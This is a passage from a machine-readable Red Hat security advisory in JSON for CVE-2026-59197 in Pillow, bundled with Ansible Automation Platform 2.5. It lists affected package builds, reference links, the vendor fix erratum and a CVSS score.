"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
